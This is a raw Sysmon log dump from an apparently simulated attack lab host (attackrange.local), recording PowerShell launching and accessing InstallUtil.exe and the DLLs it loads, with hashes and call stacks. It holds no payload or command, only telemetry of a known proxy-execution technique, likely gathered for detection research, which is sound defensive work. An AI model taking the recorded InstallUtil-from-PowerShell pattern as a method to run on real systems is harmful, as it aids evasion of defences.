17:25:01.028{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057595826Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.028{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 734700x800000000000000057595825Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.028{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=1AF6CD8B7CE4A852F67AA98C71AA1D26,SHA256=EF0DE008500A8C9C7908383AF11AE55845EBBE28C96C013EA720950BA89D3D28trueMicrosoft WindowsValid 734700x800000000000000057595824Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.028{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 734700x800000000000000057595823Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.028{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 13241300x800000000000000057595822Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:25:01.028{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7ea-0x390e5e92) 734700x800000000000000057595820Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.028{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 734700x800000000000000057595819Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.028{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057595818Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.028{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057595817Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057595816Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057595815Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057595814Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057595813Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057595812Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057595811Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057595810Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057595809Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057595808Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 734700x800000000000000057595807Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057595806Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057595805Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057595804Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057595803Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057595802Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057595801Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057595800Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x800000000000000057595799Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057595798Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71trueMicrosoft CorporationValid 10341000x800000000000000057595797Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36C-618E-94FC-04000000F101}91087336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01f5|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+1f1c9cab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45fb9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+456aaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b379(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a2d74(wow64) 10341000x800000000000000057595796Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.012{8B6011A9-A36C-618E-94FC-04000000F101}91087336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3566|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+1f1c9cab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45fb9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+456aaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b379(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a2d74(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a29fc(wow64) 10341000x800000000000000057595794Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:00.996{8B6011A9-888A-6164-7000-00000000F101}34483736C:\Windows\system32\csrss.exe{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057595793Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:00.996{8B6011A9-A36C-618E-94FC-04000000F101}91087336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+1f1c9cab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+1f1c9cab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+1f1c9cab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+1f1c9cab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45fb9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+456aaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b379(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\S